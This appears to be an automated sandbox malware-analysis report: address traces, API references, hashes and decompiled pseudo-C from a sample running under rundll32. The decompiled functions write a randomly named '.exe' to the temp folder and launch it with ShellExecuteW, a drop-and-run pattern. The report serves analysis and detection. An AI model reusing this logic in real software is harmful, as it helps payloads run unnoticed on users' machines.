                                                            0x04669a46
                                                            0x04669a48
                                                            0x04669a4b
                                                            0x04669a4f
                                                            0x04669a4f
                                                            0x04669a51
                                                            0x04669a53
                                                            0x04669a55
                                                            0x04669a57
                                                            0x04669a57
                                                            0x04669a59
                                                            0x04669a5c
                                                            0x04669a5f
                                                            0x04669a5f
                                                            0x04669a61
                                                            0x04669a62
                                                            0x04669a62
                                                            0x04669a6d
                                                            0x04669a6f
                                                            0x04669a72
                                                            0x04669a73
                                                            0x04669a76
                                                            0x04669a76
                                                            0x04669a7a
                                                            0x04669a7d
                                                            0x04669a80
                                                            0x04669a80
                                                            0x04669a8e
                                                            0x04669a90
                                                            0x04669a93
                                                            0x04669a95
                                                            0x04669a9f
                                                            0x04669aa2
                                                            0x04669aa5
                                                            0x04669aa7
                                                            0x04669aaa
                                                            0x04669aac
                                                            0x04669afc
                                                            0x04669aff
                                                            0x04669aff
                                                            0x04669b01
                                                            0x00000000
                                                            0x04669aae
                                                            0x04669ab0
                                                            0x04669ab0
                                                            0x04669ab2
                                                            0x04669ab5
                                                            0x04669ab5
                                                            0x04669aba
                                                            0x04669abd
                                                            0x04669abd
                                                            0x04669abf
                                                            0x04669ac0
                                                            0x04669ac0
                                                            0x04669ac4
                                                            0x04669ac7
                                                            0x04669ac7
                                                            0x04669aca
                                                            0x04669acd
                                                            0x04669ada
                                                            0x04669adf
                                                            0x04669ae2
                                                            0x04669ae4
                                                            0x04669b1e
                                                            0x04669b1f
                                                            0x04669b20
                                                            0x04669b21
                                                            0x04669b22
                                                            0x04669b23
                                                            0x04669b28
                                                            0x04669b2c
                                                            0x04669b2e
                                                            0x04669b2f
                                                            0x04669b32
                                                            0x04669b35
                                                            0x04669b35
                                                            0x04669b37
                                                            0x04669b38
                                                            0x04669b38
                                                            0x04669b41
                                                            0x04669b42
                                                            0x04669b45
                                                            0x04669b48
                                                            0x04669b4b
                                                            0x04669b4d
                                                            0x04669b54
                                                            0x04669b59
                                                            0x04669b63
                                                            0x04669b66
                                                            0x04669b67
                                                            0x04669b69
                                                            0x04669b7d
                                                            0x04669b7d
                                                            0x04669b80
                                                            0x04669b8a
                                                            0x04669b8f
                                                            0x04669b92
                                                            0x04669b94
                                                            0x00000000
                                                            0x04669b96
                                                            0x04669b9a
                                                            0x04669ba3
                                                            0x04669ba9
                                                            0x00000000
                                                            0x04669bac
                                                            0x04669b6b
                                                            0x04669b6b
                                                            0x04669b71
                                                            0x04669b76
                                                            0x04669b79
                                                            0x04669b7b
                                                            0x04669bb2
                                                            0x04669bb4
                                                            0x04669bb5
                                                            0x04669bb6
                                                            0x04669bb7
                                                            0x04669bb8
                                                            0x04669bb9
                                                            0x04669bbe
                                                            0x04669bc1
                                                            0x04669bc2
                                                            0x04669bc4
                                                            0x04669bd1
                                                            0x04669bd4
                                                            0x04669bd7
                                                            0x04669bd8
                                                            0x04669bdb
                                                            0x04669bdc
                                                            0x04669bdf
                                                            0x04669be0
                                                            0x04669c01
                                                            0x04669c01
                                                            0x04669c03
                                                            0x00000000
                                                            0x00000000
                                                            0x04669be8
                                                            0x04669bea
                                                            0x04669bec
                                                            0x04669bee
                                                            0x04669bf0
                                                            0x04669bf2
                                                            0x04669bf4
                                                            0x04669bff
                                                            0x00000000
                                                            0x04669bff
                                                            0x04669bf4
                                                            0x04669bf0
                                                            0x00000000
                                                            0x04669bec
                                                            0x04669c05
                                                            0x04669c07
                                                            0x04669c0a
                                                            0x04669c23
                                                            0x04669c23
                                                            0x04669c25
                                                            0x04669c28
                                                            0x04669c38
                                                            0x04669c3a
                                                            0x04669c3a
                                                            0x04669c2a
                                                            0x04669c2a
                                                            0x04669c2d
                                                            0x00000000
                                                            0x04669c2f
                                                            0x04669c2f
                                                            0x04669c32
                                                            0x00000000
                                                            0x04669c34
                                                            0x04669c34
                                                            0x04669c34
                                                            0x04669c32
                                                            0x04669c2d
                                                            0x04669c48
                                                            0x04669c4c
                                                            0x04669c5a
                                                            0x04669c5f
                                                            0x04669c74
                                                            0x04669c76
                                                            0x04669c7c
                                                            0x04669c7f
                                                            0x04669cb1
                                                            0x04669cb1
                                                            0x04669cb6
                                                            0x04669cbc
                                                            0x04669cbc
                                                            0x04669cc3
                                                            0x04669cdd
                                                            0x04669cdd
                                                            0x04669cde
                                                            0x04669ce4
                                                            0x04669cea
                                                            0x04669ceb
                                                            0x04669cec
                                                            0x04669cf1
                                                            0x04669cf4
                                                            0x04669cf6
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x04669cc5
                                                            0x04669cc5
                                                            0x04669ccb
                                                            0x04669ccd
                                                            0x00000000
                                                            0x04669ccf
                                                            0x04669ccf
                                                            0x04669cd2
                                                            0x00000000
                                                            0x04669cd4
                                                            0x04669cd4
                                                            0x04669cdb
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x04669cdb
                                                            0x04669cd2
                                                            0x04669ccd
                                                            0x00000000
                                                            0x04669cf8
                                                            0x04669d00
                                                            0x04669d06
                                                            0x04669d08
                                                            0x04669d08
                                                            0x04669d10
                                                            0x04669d15
                                                            0x04669d1d
                                                            0x04669d20
                                                            0x04669d22
                                                            0x04669d36
                                                            0x04669d3b
                                                            0x04669c81
                                                            0x04669c81
                                                            0x04669c82
                                                            0x04669c83
                                                            0x04669c84
                                                            0x04669c85
                                                            0x04669c8d
                                                            0x04669c8d
                                                            0x04669c8d
                                                            0x04669c8f
                                                            0x04669c92
                                                            0x04669c95
                                                            0x04669c95
                                                            0x04669c0c
                                                            0x04669c0f
                                                            0x04669c11
                                                            0x00000000
                                                            0x04669c13
                                                            0x04669c13
                                                            0x04669c16
                                                            0x04669c17
                                                            0x04669c18
                                                            0x04669c19
                                                            0x04669c1e
                                                            0x04669c11
                                                            0x04669c9d
                                                            0x04669ca2
                                                            0x04669cad
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x04669b7b
                                                            0x04669b4f
                                                            0x04669b51
                                                            0x04669bad
                                                            0x04669bb1
                                                            0x04669bb1
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x04669ae6
                                                            0x04669ae9
                                                            0x04669aec
                                                            0x04669aef
                                                            0x04669af2
                                                            0x04669af5
                                                            0x04669af8
                                                            0x04669af8
                                                            0x00000000
                                                            0x04669ab5
                                                            0x04669a97
                                                            0x04669a97
                                                            0x04669b03
                                                            0x04669b05
                                                            0x00000000
                                                            0x04669b0a
                                                            0x046699d9
                                                            0x046699d9
                                                            0x046699dc
                                                            0x046699e5
                                                            0x046699e8
                                                            0x046699ef
                                                            0x046699f1
                                                            0x04669a0a
                                                            0x04669a0b
                                                            0x04669a0c
                                                            0x04669a0e
                                                            0x04669a13
                                                            0x046699f3
                                                            0x046699f3
                                                            0x046699f6
                                                            0x046699f7
                                                            0x046699f9
                                                            0x046699fb
                                                            0x046699fd
                                                            0x04669a02
                                                            0x04669a02
                                                            0x04669a16
                                                            0x04669a18
                                                            0x04669a1a
                                                            0x00000000
                                                            0x00000000
                                                            0x04669a20
                                                            0x04669a23
                                                            0x04669a25
                                                            0x04669a27
                                                            0x00000000
                                                            0x04669a29
                                                            0x04669a29
                                                            0x04669a2c
                                                            0x00000000
                                                            0x04669a2c
                                                            0x00000000
                                                            0x04669a27
                                                            0x04669b0b
                                                            0x04669b0e
                                                            0x04669b13
                                                            0x00000000
                                                            0x04669b16
                                                            0x046699a9
                                                            0x046699a9
                                                            0x046699b0
                                                            0x046699b1
                                                            0x046699b3
                                                            0x046699b8
                                                            0x04669b17
                                                            0x04669b1b
                                                            0x04669b1b
                                                            0x00000000

                                                            APIs
                                                            • _free.LIBCMT ref: 04669B05
                                                              • Part of subcall function 0465EF13: IsProcessorFeaturePresent.KERNEL32(00000017,0465EEE5,00000000,00000001,00000004,00000000,00000001,00000001,?,?,0465EEF2,00000000,00000000,00000000,00000000,00000000), ref: 0465EF15
                                                              • Part of subcall function 0465EF13: GetCurrentProcess.KERNEL32(C0000417,00000001), ref: 0465EF37
                                                              • Part of subcall function 0465EF13: TerminateProcess.KERNEL32(00000000), ref: 0465EF3E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                            • String ID: *?$.
                                                            • API String ID: 2667617558-3972193922
                                                            • Opcode ID: 77f52ca0845749342b5189b1e5290ed6d38713f7e75f0feb82b1dd4567dae4a6
                                                            • Instruction ID: a5608e0d041fb3c6acf9d81b13bb4c33b84cd7df805e4ad2576d7427911cb4de
                                                            • Opcode Fuzzy Hash: 77f52ca0845749342b5189b1e5290ed6d38713f7e75f0feb82b1dd4567dae4a6
                                                            • Instruction Fuzzy Hash: C251A3B5E00209AFDF14DFA9C880AAEB7F5EF58314F24816ED855E7340F671AA05CB50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 34%
                                                            			E04639D70(void* __esi, void* __eflags) {
                                                            				signed int _v8;
                                                            				signed int _v9;
                                                            				struct _SECURITY_ATTRIBUTES* _v20;
                                                            				struct _SECURITY_ATTRIBUTES* _v21;
                                                            				struct _SECURITY_ATTRIBUTES* _v24;
                                                            				struct _SECURITY_ATTRIBUTES* _v25;
                                                            				struct _SECURITY_ATTRIBUTES* _v28;
                                                            				struct _SECURITY_ATTRIBUTES* _v29;
                                                            				struct _SECURITY_ATTRIBUTES* _v44;
                                                            				char _v48;
                                                            				struct _SECURITY_ATTRIBUTES* _v52;
                                                            				struct _SECURITY_ATTRIBUTES* _v56;
                                                            				intOrPtr _v60;
                                                            				intOrPtr _v61;
                                                            				struct _SECURITY_ATTRIBUTES* _v64;
                                                            				intOrPtr _v68;
                                                            				intOrPtr _v69;
                                                            				struct _SECURITY_ATTRIBUTES* _v72;
                                                            				intOrPtr _v73;
                                                            				struct _SECURITY_ATTRIBUTES* _v76;
                                                            				intOrPtr _v81;
                                                            				intOrPtr* _v92;
                                                            				char _v108;
                                                            				char _v109;
                                                            				void* _v112;
                                                            				void* _v113;
                                                            				char* _v116;
                                                            				char _v120;
                                                            				intOrPtr _v121;
                                                            				char _v124;
                                                            				signed int _t44;
                                                            				void* _t52;
                                                            				void** _t69;
                                                            				intOrPtr* _t71;
                                                            				intOrPtr _t72;
                                                            				signed int _t81;
                                                            				signed int _t83;
                                                            				signed int _t84;
                                                            
                                                            				_t83 = (_t81 & 0xfffffff8) - 0x7c;
                                                            				_t44 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t44 ^ _t83;
                                                            				E04637980( &_v108);
                                                            				_v68 = 0x467e048;
                                                            				_v64 = 0;
                                                            				_v60 = 0x467e024;
                                                            				_v56 = 0;
                                                            				_v20 = 0;
                                                            				_v28 = 0;
                                                            				_v24 = 0;
                                                            				_v44 = 0;
                                                            				_v76 = 0;
                                                            				_v72 = 0;
                                                            				_v52 = 0;
                                                            				_v48 = 0x43;
                                                            				E04638AE0( &_v108,  *0x46878d4 & 0x0000ffff);
                                                            				_t69 =  &_v112;
                                                            				_t84 = _t83 - 0xc;
                                                            				_push( *0x4684760 & 0x0000ffff);
                                                            				_push(0x46878d8);
                                                            				if(L04638BB0(_t69) != 0) {
                                                            					_v120 = 0x467e8b0;
                                                            					_v116 =  &_v108;
                                                            					_v52 =  &_v120;
                                                            					_t52 = CreateEventW(0, 1, 0, 0);
                                                            					_push(_t69);
                                                            					_push(0x3f);
                                                            					_v112 = _t52;
                                                            					_push(1);
                                                            					_push( &_v124);
                                                            					_v120 = 0x467ecbc;
                                                            					_v124 = 0x86;
                                                            					E04631C60(_v116);
                                                            					_t71 = _v92;
                                                            					if(_t71 != 0) {
                                                            						 *((intOrPtr*)( *_t71 + 0x14))(0xffffffff);
                                                            					}
                                                            					_t72 = _v73;
                                                            					if(_t72 != 0) {
                                                            						 *((intOrPtr*)( *((intOrPtr*)(_t72 + 4)) + 0x14))(0xffffffff);
                                                            					}
                                                            					_v121 = 0x467e8b0;
                                                            					CloseHandle(_v113);
                                                            					_v121 = 0x467e8c0;
                                                            				}
                                                            				E04638C90( &_v109);
                                                            				_t57 = _v29;
                                                            				if(_v29 != 0) {
                                                            					L04655B0F(_t57);
                                                            					_t84 = _t84 + 4;
                                                            				}
                                                            				_t58 = _v81;
                                                            				_v21 = 0;
                                                            				_v29 = 0;
                                                            				_v25 = 0;
                                                            				_v61 = 0x467df88;
                                                            				_v69 = 0x467e008;
                                                            				if(_v81 != 0) {
                                                            					L04655B0F(_t58);
                                                            					_t84 = _t84 + 4;
                                                            				}
                                                            				return E04655AFE(_v9 ^ _t84);
                                                            			}









































                                                            0x04639d76
                                                            0x04639d79
                                                            0x04639d80
                                                            0x04639d90
                                                            0x04639d9a
                                                            0x04639da2
                                                            0x04639daa
                                                            0x04639db2
                                                            0x04639dba
                                                            0x04639dc2
                                                            0x04639dca
                                                            0x04639dd2
                                                            0x04639dda
                                                            0x04639de2
                                                            0x04639dea
                                                            0x04639df2
                                                            0x04639df7
                                                            0x04639e03
                                                            0x04639e07
                                                            0x04639e0a
                                                            0x04639e0b
                                                            0x04639e17
                                                            0x04639e29
                                                            0x04639e31
                                                            0x04639e3d
                                                            0x04639e41
                                                            0x04639e47
                                                            0x04639e4c
                                                            0x04639e4e
                                                            0x04639e56
                                                            0x04639e58
                                                            0x04639e59
                                                            0x04639e61
                                                            0x04639e66
                                                            0x04639e6b
                                                            0x04639e71
                                                            0x04639e77
                                                            0x04639e77
                                                            0x04639e7a
                                                            0x04639e80
                                                            0x04639e8a
                                                            0x04639e8a
                                                            0x04639e93
                                                            0x04639e9b
                                                            0x04639ea1
                                                            0x04639ea1
                                                            0x04639ead
                                                            0x04639eb2
                                                            0x04639eb8
                                                            0x04639ebb
                                                            0x04639ec0
                                                            0x04639ec0
                                                            0x04639ec3
                                                            0x04639ec7
                                                            0x04639ecf
                                                            0x04639ed7
                                                            0x04639edf
                                                            0x04639ee7
                                                            0x04639ef1
                                                            0x04639ef4
                                                            0x04639ef9
                                                            0x04639ef9
                                                            0x04639f0d

                                                            APIs
                                                              • Part of subcall function 04637980: LoadLibraryA.KERNEL32(ntdll.dll,00000000,?,00000000,0464B836), ref: 046379B0
                                                              • Part of subcall function 04637980: GetProcAddress.KERNEL32(00000000,RtlGetCompressionWorkSpaceSize), ref: 046379C2
                                                              • Part of subcall function 04637980: GetProcAddress.KERNEL32(00000000,RtlCompressBuffer), ref: 046379D5
                                                              • Part of subcall function 04637980: GetProcAddress.KERNEL32(00000000,RtlDecompressBuffer), ref: 046379E8
                                                            • CreateEventW.KERNEL32(00000000,00000001), ref: 04639E41
                                                            • CloseHandle.KERNEL32(0467E8B0,00000000,00000001,0000003F), ref: 04639E9B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AddressProc$CloseCreateEventHandleLibraryLoad
                                                            • String ID: C
                                                            • API String ID: 1850149996-1037565863
                                                            • Opcode ID: e62f7c020dfe6eee8d069aed1638a1df624b9a20cbd642569a0aa1e6a4511ae0
                                                            • Instruction ID: 81d41a3d2537931ce501ded8339c2228c87f2614f5f5d839169061c19aa927a8
                                                            • Opcode Fuzzy Hash: e62f7c020dfe6eee8d069aed1638a1df624b9a20cbd642569a0aa1e6a4511ae0
                                                            • Instruction Fuzzy Hash: EA4139B15083819FE310DF64C458B1BBBE4AF95719F100A1DF5A19A2E0EBB6E508CF97
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 41%
                                                            			E04639820(void* __esi, void* __eflags) {
                                                            				void* _v5;
                                                            				signed int _v8;
                                                            				void* _v17;
                                                            				char _v20;
                                                            				void* _v21;
                                                            				char _v24;
                                                            				void* _v25;
                                                            				char _v28;
                                                            				char _v44;
                                                            				char _v48;
                                                            				char _v52;
                                                            				char _v56;
                                                            				void* _v57;
                                                            				intOrPtr _v60;
                                                            				char _v64;
                                                            				void* _v65;
                                                            				intOrPtr _v68;
                                                            				void* _v69;
                                                            				char _v72;
                                                            				char _v76;
                                                            				void* _v77;
                                                            				intOrPtr* _v80;
                                                            				void* _v105;
                                                            				char _v108;
                                                            				void* _v109;
                                                            				void* _v112;
                                                            				void* _v113;
                                                            				void* _v117;
                                                            				void* _v125;
                                                            				char _v128;
                                                            				signed int _t39;
                                                            				intOrPtr* _t66;
                                                            				intOrPtr _t67;
                                                            				intOrPtr* _t68;
                                                            				signed int _t77;
                                                            				signed int _t79;
                                                            				signed int _t80;
                                                            
                                                            				_t79 = (_t77 & 0xfffffff8) - 0x7c;
                                                            				_t39 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t39 ^ _t79;
                                                            				E04637980( &_v108);
                                                            				_v68 = 0x467e048;
                                                            				_v64 = 0;
                                                            				_v60 = 0x467e024;
                                                            				_v56 = 0;
                                                            				_v20 = 0;
                                                            				_v28 = 0;
                                                            				_v24 = 0;
                                                            				_v44 = 0;
                                                            				_v76 = 0;
                                                            				_v72 = 0;
                                                            				_v52 = 0;
                                                            				_v48 = 0x43;
                                                            				E04638AE0( &_v108,  *0x46878d4 & 0x0000ffff);
                                                            				_t80 = _t79 - 0xc;
                                                            				_push( *0x4684760 & 0x0000ffff);
                                                            				_push(0x46878d8);
                                                            				if(L04638BB0( &_v112) != 0) {
                                                            					E04632000( &_v128,  &_v108);
                                                            					_t66 = _v80;
                                                            					if(_t66 != 0) {
                                                            						 *((intOrPtr*)( *_t66 + 0x14))(0xffffffff);
                                                            					}
                                                            					_t67 = _v72;
                                                            					if(_t67 != 0) {
                                                            						 *((intOrPtr*)( *((intOrPtr*)(_t67 + 4)) + 0x14))(0xffffffff);
                                                            					}
                                                            					_v128 = 0x467d858;
                                                            					 *0x46878c8 = 0;
                                                            					WaitForSingleObject(_v112, 0xffffffff);
                                                            					_t68 =  *((intOrPtr*)(_t80 + 0x10));
                                                            					if(_t68 != 0) {
                                                            						 *((intOrPtr*)( *_t68))(1);
                                                            					}
                                                            					_v128 = 0x467e8b0;
                                                            					CloseHandle( *(_t80 + 0xc));
                                                            					_v128 = 0x467e8c0;
                                                            				}
                                                            				E04638C90( &_v108);
                                                            				_t50 = _v28;
                                                            				if(_v28 != 0) {
                                                            					L04655B0F(_t50);
                                                            					_t80 = _t80 + 4;
                                                            				}
                                                            				_t51 = _v80;
                                                            				_v20 = 0;
                                                            				_v28 = 0;
                                                            				_v24 = 0;
                                                            				_v60 = 0x467df88;
                                                            				_v68 = 0x467e008;
                                                            				if(_v80 != 0) {
                                                            					L04655B0F(_t51);
                                                            					_t80 = _t80 + 4;
                                                            				}
                                                            				return E04655AFE(_v8 ^ _t80);
                                                            			}








































                                                            0x04639826
                                                            0x04639829
                                                            0x04639830
                                                            0x04639840
                                                            0x0463984a
                                                            0x04639852
                                                            0x0463985a
                                                            0x04639862
                                                            0x0463986a
                                                            0x04639872
                                                            0x0463987a
                                                            0x04639882
                                                            0x0463988a
                                                            0x04639892
                                                            0x0463989a
                                                            0x046398a2
                                                            0x046398a7
                                                            0x046398b7
                                                            0x046398ba
                                                            0x046398bb
                                                            0x046398c7
                                                            0x046398d7
                                                            0x046398dc
                                                            0x046398e2
                                                            0x046398e8
                                                            0x046398e8
                                                            0x046398eb
                                                            0x046398f1
                                                            0x046398fb
                                                            0x046398fb
                                                            0x04639906
                                                            0x0463990e
                                                            0x04639915
                                                            0x0463991b
                                                            0x04639921
                                                            0x04639927
                                                            0x04639927
                                                            0x0463992d
                                                            0x04639935
                                                            0x0463993b
                                                            0x0463993b
                                                            0x04639947
                                                            0x0463994c
                                                            0x04639952
                                                            0x04639955
                                                            0x0463995a
                                                            0x0463995a
                                                            0x0463995d
                                                            0x04639961
                                                            0x04639969
                                                            0x04639971
                                                            0x04639979
                                                            0x04639981
                                                            0x0463998b
                                                            0x0463998e
                                                            0x04639993
                                                            0x04639993
                                                            0x046399a7

                                                            APIs
                                                              • Part of subcall function 04637980: LoadLibraryA.KERNEL32(ntdll.dll,00000000,?,00000000,0464B836), ref: 046379B0
                                                              • Part of subcall function 04637980: GetProcAddress.KERNEL32(00000000,RtlGetCompressionWorkSpaceSize), ref: 046379C2
                                                              • Part of subcall function 04637980: GetProcAddress.KERNEL32(00000000,RtlCompressBuffer), ref: 046379D5
                                                              • Part of subcall function 04637980: GetProcAddress.KERNEL32(00000000,RtlDecompressBuffer), ref: 046379E8
                                                            • WaitForSingleObject.KERNEL32(?), ref: 04639915
                                                            • CloseHandle.KERNEL32(0467D858), ref: 04639935
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AddressProc$CloseHandleLibraryLoadObjectSingleWait
                                                            • String ID: C
                                                            • API String ID: 2253563908-1037565863
                                                            • Opcode ID: d8b85f358cab0eb9029ee7b56e41cfc0243edf3c9c95762edb7c1fbe3b90068b
                                                            • Instruction ID: d4bec2c962c6877ecdedbd9e34eab4b8553a4f23fad9134ceb565f51752ac6ed
                                                            • Opcode Fuzzy Hash: d8b85f358cab0eb9029ee7b56e41cfc0243edf3c9c95762edb7c1fbe3b90068b
                                                            • Instruction Fuzzy Hash: 3C4127B05083819BE710DF64C45871BBBE4EF91359F144A1CF9A28A2A0EB75E808CF93
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E0463E360(intOrPtr* _a4) {
                                                            				void* _t22;
                                                            				short* _t27;
                                                            				intOrPtr _t37;
                                                            				void* _t39;
                                                            				intOrPtr* _t41;
                                                            
                                                            				_t41 = _a4;
                                                            				_t39 = 0;
                                                            				 *(_t41 + 0x24) = 1;
                                                            				if( *((intOrPtr*)( *_t41 + 0x18)) <= 0) {
                                                            					L4:
                                                            					if( *((intOrPtr*)(_t41 + 0x14)) != 0) {
                                                            						_t37 =  *_t41;
                                                            						_t50 =  *((intOrPtr*)(_t37 + 0x24));
                                                            						if( *((intOrPtr*)(_t37 + 0x24)) > 0) {
                                                            							_t27 = E0463E0C0(( *(_t37 + 0x4d) & 0x000000ff) + ( *(_t37 + 0x4c) & 0x000000ff) + ( *(_t37 + 0x4b) & 0x000000ff) + ( *(_t37 + 0x4a) & 0x000000ff), _t37, _t50, ( *(_t37 + 0x4d) & 0x000000ff) + ( *(_t37 + 0x4c) & 0x000000ff) + ( *(_t37 + 0x4b) & 0x000000ff) + ( *(_t37 + 0x4a) & 0x000000ff));
                                                            							E0463E5C0(_t41);
                                                            							_t22 = E0463E040(_t27,  *((intOrPtr*)(_t41 + 0x14)),  *((intOrPtr*)( *_t41 + 0x24)));
                                                            							E0463E5C0(_t41);
                                                            							if(_t22 != 0) {
                                                            								ShellExecuteW(0, L"open", _t27,  *(_t41 + 0xc), 0, 1);
                                                            							}
                                                            							L04655B0F(_t27);
                                                            						}
                                                            					}
                                                            					goto L9;
                                                            				} else {
                                                            					while(1) {
                                                            						Sleep(0x3e8);
                                                            						_t39 = _t39 + 1;
                                                            						if( *(_t41 + 0x24) == 0) {
                                                            							break;
                                                            						}
                                                            						if(_t39 <  *((intOrPtr*)( *_t41 + 0x18))) {
                                                            							continue;
                                                            						}
                                                            						goto L4;
                                                            					}
                                                            					L9:
                                                            					return 0;
                                                            				}
                                                            			}








                                                            0x0463e365
                                                            0x0463e369
                                                            0x0463e36d
                                                            0x0463e377
                                                            0x0463e395
                                                            0x0463e399
                                                            0x0463e39b
                                                            0x0463e39d
                                                            0x0463e3a1
                                                            0x0463e3c4
                                                            0x0463e3c6
                                                            0x0463e3d5
                                                            0x0463e3e1
                                                            0x0463e3e8
                                                            0x0463e3f9
                                                            0x0463e3f9
                                                            0x0463e400
                                                            0x0463e405
                                                            0x0463e3a1
                                                            0x00000000
                                                            0x0463e379
                                                            0x0463e380
                                                            0x0463e385
                                                            0x0463e387
                                                            0x0463e38c
                                                            0x00000000
                                                            0x00000000
                                                            0x0463e393
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0463e393
                                                            0x0463e40a
                                                            0x0463e40e
                                                            0x0463e40e

                                                            APIs
                                                            • Sleep.KERNEL32(000003E8), ref: 0463E385
                                                            • ShellExecuteW.SHELL32(00000000,open,00000000,00000001,00000000,00000001), ref: 0463E3F9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ExecuteShellSleep
                                                            • String ID: open
                                                            • API String ID: 4194306370-2758837156
                                                            • Opcode ID: 4143a85f4bf7604d25bb1f6655e73d7cf88ca18f474f4f606e6a575b31c8a5ea
                                                            • Instruction ID: b7ef1d143b5914231f52a91823ba6f4d98fb8b26f82b00e15c50e5c3fa2c1774
                                                            • Opcode Fuzzy Hash: 4143a85f4bf7604d25bb1f6655e73d7cf88ca18f474f4f606e6a575b31c8a5ea
                                                            • Instruction Fuzzy Hash: FC11D6717002809FF7249B65D854B29B7E5AF5831AF04086DE58A8B382F677FC40CBB4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 87%
                                                            			E0463E0C0(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
                                                            				char* _v8;
                                                            				void* __esi;
                                                            				signed int _t26;
                                                            				WCHAR* _t28;
                                                            				WCHAR* _t32;
                                                            				signed int _t35;
                                                            				void* _t36;
                                                            				signed int _t40;
                                                            				void* _t44;
                                                            				signed short* _t45;
                                                            				signed int _t53;
                                                            
                                                            				_t36 = __edx;
                                                            				_t34 = __ecx;
                                                            				_push(__ecx);
                                                            				_push(0x208);
                                                            				_v8 = L".exe";
                                                            				_t32 = L04655B55(__ecx, L".exe", __eflags);
                                                            				 *_t32 = 0;
                                                            				_t40 = GetTempPathW(0x104, _t32);
                                                            				if(_t40 != 0 &&  *((short*)(_t32 + _t40 * 2 - 2)) != 0x5c) {
                                                            					_t32[_t40] = 0x5c;
                                                            					_t40 = _t40 + 1;
                                                            					_t53 = _t40;
                                                            				}
                                                            				E0465EF67(_t34, E0465F548(_t34, _t36, _t53, 0) + _a4);
                                                            				_t44 = 8;
                                                            				do {
                                                            					_t26 = E0465EF46(_t34);
                                                            					asm("cdq");
                                                            					_t40 = _t40 + 1;
                                                            					_t34 = 0x1a;
                                                            					 *((short*)(_t32 + _t40 * 2 - 2)) = _t26 % 0x1a + 0x61;
                                                            					_t44 = _t44 - 1;
                                                            				} while (_t44 != 0);
                                                            				_t45 = _v8;
                                                            				_t28 =  &(_t32[_t40]);
                                                            				_t35 = 0x2e;
                                                            				do {
                                                            					 *_t28 = _t35;
                                                            					_t45 =  &(_t45[1]);
                                                            					_t35 =  *_t45 & 0x0000ffff;
                                                            					_t28 =  &(_t28[1]);
                                                            				} while (_t35 != 0);
                                                            				return _t32;
                                                            			}














                                                            0x0463e0c0
                                                            0x0463e0c0
                                                            0x0463e0c3
                                                            0x0463e0cc
                                                            0x0463e0d1
                                                            0x0463e0dc
                                                            0x0463e0e4
                                                            0x0463e0f0
                                                            0x0463e0f4
                                                            0x0463e103
                                                            0x0463e107
                                                            0x0463e107
                                                            0x0463e107
                                                            0x0463e113
                                                            0x0463e11b
                                                            0x0463e120
                                                            0x0463e120
                                                            0x0463e125
                                                            0x0463e126
                                                            0x0463e129
                                                            0x0463e133
                                                            0x0463e138
                                                            0x0463e138
                                                            0x0463e13d
                                                            0x0463e140
                                                            0x0463e143
                                                            0x0463e150
                                                            0x0463e150
                                                            0x0463e153
                                                            0x0463e156
                                                            0x0463e159
                                                            0x0463e15c
                                                            0x0463e169

                                                            APIs
                                                            • GetTempPathW.KERNEL32(00000104,00000000), ref: 0463E0EA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: PathTemp
                                                            • String ID: .exe$\
                                                            • API String ID: 2920410445-2920562713
                                                            • Opcode ID: f6b8eb1458dc7b10485778205b546b640c2c449d8bc84224bfc4460c879e5d4b
                                                            • Instruction ID: f06d50cc01b4c9410a5ee7caa2c75eca6928b5026b5c3dbd39ee51c2e758b32b
